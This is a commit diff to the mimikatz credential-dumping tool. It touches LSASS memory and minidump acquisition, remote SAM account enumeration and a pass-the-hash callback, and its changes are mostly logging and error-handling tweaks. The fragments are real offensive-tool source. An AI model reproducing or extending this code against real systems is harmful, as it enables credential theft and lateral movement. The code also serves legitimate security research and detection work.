Some cosmetic fixes (output, unicode detect, vault "pause", ...)

2025-03-01 16:20:21 +00:00 · 2014-04-25 02:03:55 +02:00 · 2014-04-25 02:03:55 +02:00 · 568b71c590
commit 568b71c590
parent 106b6f4fd0
7 changed files with 38 additions and 27 deletions
--- a/inc/globals.h
+++ b/inc/globals.h
@ -19,7 +19,7 @@
 //#define NTSECAPI_HEADER_FIXED	// http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader
 //#define KERBEROS_TOOLS
 //#define LSASS_DECRYPT
-//#define NET_MODULE
+#define NET_MODULE
 #ifdef _M_X64
 	#define MIMIKATZ_ARCH L"x64"
 #else ifdef _M_IX86
--- a/mimikatz/modules/kuhl_m_net.c
+++ b/mimikatz/modules/kuhl_m_net.c
@ -18,7 +18,7 @@ const KUHL_M kuhl_m_net = {
 NTSTATUS kuhl_m_net_user(int argc, wchar_t * argv[])
 {
 	NTSTATUS status, enumDomainStatus, enumUserStatus;
-	UNICODE_STRING /*serverName,*/ *groupName;
+	UNICODE_STRING serverName, *groupName;
 	SAMPR_HANDLE hServerHandle, hBuiltinHandle = NULL, hDomainHandle, hUserHandle;
 	DWORD domainEnumerationContext, domainCountRetourned, userEnumerationContext, userCountRetourned, groupsCountRetourned, i, j, k, *usage, aliasCountRetourned, *alias;
 	PSAMPR_RID_ENUMERATION pEnumDomainBuffer, pEnumUsersBuffer;
@ -26,8 +26,8 @@ NTSTATUS kuhl_m_net_user(int argc, wchar_t * argv[])
 	PGROUP_MEMBERSHIP pGroupMemberShip;
 	SID builtin = {1, 1, {0, 0, 0, 0, 0, 5}, {32}};

-	//RtlInitUnicodeString(&serverName, L"");
-	status = SamConnect(NULL/*&serverName*/, &hServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_ENUMERATE_DOMAINS | SAM_SERVER_LOOKUP_DOMAIN, FALSE);
+	RtlInitUnicodeString(&serverName, argc ? argv[0] : L"");
+	status = SamConnect(&serverName, &hServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_ENUMERATE_DOMAINS | SAM_SERVER_LOOKUP_DOMAIN, FALSE);
 	if(NT_SUCCESS(status))
 	{
 		status = SamOpenDomain(hServerHandle, DOMAIN_LIST_ACCOUNTS | DOMAIN_LOOKUP, &builtin, &hBuiltinHandle);
--- a/mimikatz/modules/kuhl_m_privilege.c
+++ b/mimikatz/modules/kuhl_m_privilege.c
@ -22,7 +22,7 @@ NTSTATUS kuhl_m_privilege_simple(ULONG privId)
 	if(NT_SUCCESS(status))
 		kprintf(L"Privilege \'%u\' OK\n", privId);
 	else
-		PRINT_ERROR(L"RtlAdjustPrivilege %08x\n", status);
+		PRINT_ERROR(L"RtlAdjustPrivilege (%u) %08x\n", privId, status);
 	return status;
 }

--- a/mimikatz/modules/kuhl_m_vault.c
+++ b/mimikatz/modules/kuhl_m_vault.c
@ -109,7 +109,6 @@ NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
 								}
 								
 								pItem7 = NULL;
-								system("pause");
 								status = VaultGetItem7(hVault, &items7[j].SchemaId, items7[j].Ressource, items7[j].Identity, NULL, 0, &pItem7);

 								kprintf(L"\t\t*Authenticator* : ");
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@ -97,13 +97,14 @@ NTSTATUS kuhl_m_sekurlsa_process(int argc, wchar_t * argv[])

 NTSTATUS kuhl_m_sekurlsa_minidump(int argc, wchar_t * argv[])
 {
-	kprintf(L"Switch to MINIDUMP\n");
+	kprintf(L"Switch to MINIDUMP : ");
 	if(argc != 1)
 		PRINT_ERROR(L"<minidumpfile.dmp> argument is missing\n");
 	else
 	{
 		kuhl_m_sekurlsa_reset();
 		pMinidumpName = _wcsdup(argv[0]);
+		kprintf(L"\'%s\'\n", pMinidumpName);
 	}
 	return STATUS_SUCCESS;
 }
@ -173,6 +174,7 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
 	DWORD pid;
 	PMINIDUMP_SYSTEM_INFO pInfos;
 	DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE;
+	BOOL isError = FALSE;

 	if(!cLsass.hLsassMem)
 	{
@ -182,6 +184,7 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
 			if(pMinidumpName)
 			{
 				Type = KULL_M_MEMORY_TYPE_PROCESS_DMP;
+				kprintf(L"Opening : \'%s\' file for minidump...\n", pMinidumpName);
 				hData = CreateFile(pMinidumpName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
 			}
 			else
@ -204,17 +207,22 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
 							cLsass.osContext.MinorVersion = pInfos->MinorVersion;
 							cLsass.osContext.BuildNumber  = pInfos->BuildNumber;

-							if(cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION)
+							if(isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION))
 								PRINT_ERROR(L"Minidump pInfos->MajorVersion (%u) != MIMIKATZ_NT_MAJOR_VERSION (%u)\n", pInfos->MajorVersion, MIMIKATZ_NT_MAJOR_VERSION);
 						#ifdef _M_X64
-							if(pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64)
+							else if(isError = (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64))
 								PRINT_ERROR(L"Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_AMD64 (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_AMD64);
 						#elif defined _M_IX86
-							if(pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_INTEL)
+							else if(isError = (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_INTEL))
 								PRINT_ERROR(L"Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_INTEL (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_INTEL);
 						#endif
+						
+						}
+						else
+						{
+							isError = TRUE;
+							PRINT_ERROR(L"Minidump without SystemInfoStream (?)\n");
 						}
-						else PRINT_ERROR(L"Minidump without SystemInfoStream (?)\n");
 					}
 					else
 					{
@ -222,26 +230,30 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
 						cLsass.osContext.MinorVersion = MIMIKATZ_NT_MINOR_VERSION;
 						cLsass.osContext.BuildNumber  = MIMIKATZ_NT_BUILD_NUMBER;
 					}
-					kuhl_m_sekurlsa_livessp_package.isValid = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8);
-					kuhl_m_sekurlsa_tspkg_package.isValid = (cLsass.osContext.MajorVersion >= 6) || (cLsass.osContext.MinorVersion < 2);
-
-					if(NT_SUCCESS(kull_m_process_getVeryBasicModuleInformations(cLsass.hLsassMem, kuhl_m_sekurlsa_findlibs, NULL)) && kuhl_m_sekurlsa_msv_package.Module.isPresent)
+					
+					if(!isError)
 					{
-						kuhl_m_sekurlsa_dpapi_lsa_package.Module = kuhl_m_sekurlsa_msv_package.Module;
-						if(kuhl_m_sekurlsa_utils_search(&cLsass, &kuhl_m_sekurlsa_msv_package.Module))
-						{
-							status = lsassLocalHelper->AcquireKeys(&cLsass, &lsassPackages[0]->Module.Informations);
+						kuhl_m_sekurlsa_livessp_package.isValid = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8);
+						kuhl_m_sekurlsa_tspkg_package.isValid = (cLsass.osContext.MajorVersion >= 6) || (cLsass.osContext.MinorVersion < 2);

-							if(!NT_SUCCESS(status))
-								PRINT_ERROR(L"Key import\n");
+						if(NT_SUCCESS(kull_m_process_getVeryBasicModuleInformations(cLsass.hLsassMem, kuhl_m_sekurlsa_findlibs, NULL)) && kuhl_m_sekurlsa_msv_package.Module.isPresent)
+						{
+							kuhl_m_sekurlsa_dpapi_lsa_package.Module = kuhl_m_sekurlsa_msv_package.Module;
+							if(kuhl_m_sekurlsa_utils_search(&cLsass, &kuhl_m_sekurlsa_msv_package.Module))
+							{
+								status = lsassLocalHelper->AcquireKeys(&cLsass, &lsassPackages[0]->Module.Informations);
+
+								if(!NT_SUCCESS(status))
+									PRINT_ERROR(L"Key import\n");
+							}
+							else PRINT_ERROR(L"Logon list\n");
 						}
-						else PRINT_ERROR(L"Logon list\n");
+						else PRINT_ERROR(L"Modules informations\n");
 					}
-					else PRINT_ERROR(L"Modules informations\n");
 				}
 				else PRINT_ERROR(L"Memory opening\n");
 			}
-			else PRINT_ERROR(L"Handle of memory : %08x\n", GetLastError());
+			else PRINT_ERROR_AUTO(L"Handle on memory");

 			if(!NT_SUCCESS(status))
 			{
--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
@ -52,7 +52,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY
 	RtlCopyMemory((PBYTE) pPrimaryCreds + (ULONG_PTR) pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
 	(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);

-	kprintf(L"Data copy @%p : ", origBufferAddress->address);
+	kprintf(L"Data copy @ %p : ", origBufferAddress->address);
 	if(pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
 		kprintf(L"OK !\n");
 	else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
--- a/modules/kull_m_string.c
+++ b/modules/kull_m_string.c
@ -19,8 +19,8 @@ BOOL kull_m_string_suspectUnicodeStringStructure(IN PUNICODE_STRING pUnicodeStri

 BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString)
 {
-	int unicodeTestFlags = IS_TEXT_UNICODE_ODD_LENGTH | IS_TEXT_UNICODE_STATISTICS;
-	return IsTextUnicode(pUnicodeString->Buffer, pUnicodeString->Length, &unicodeTestFlags);
+	int unicodeTestFlags = IS_TEXT_UNICODE_STATISTICS;
+	return ((pUnicodeString->Length == sizeof(wchar_t)) && IsCharAlphaNumeric(pUnicodeString->Buffer[0])) || IsTextUnicode(pUnicodeString->Buffer, pUnicodeString->Length, &unicodeTestFlags);
 }

 BOOL kull_m_string_getUnicodeString(IN PUNICODE_STRING string, IN PKULL_M_MEMORY_HANDLE source)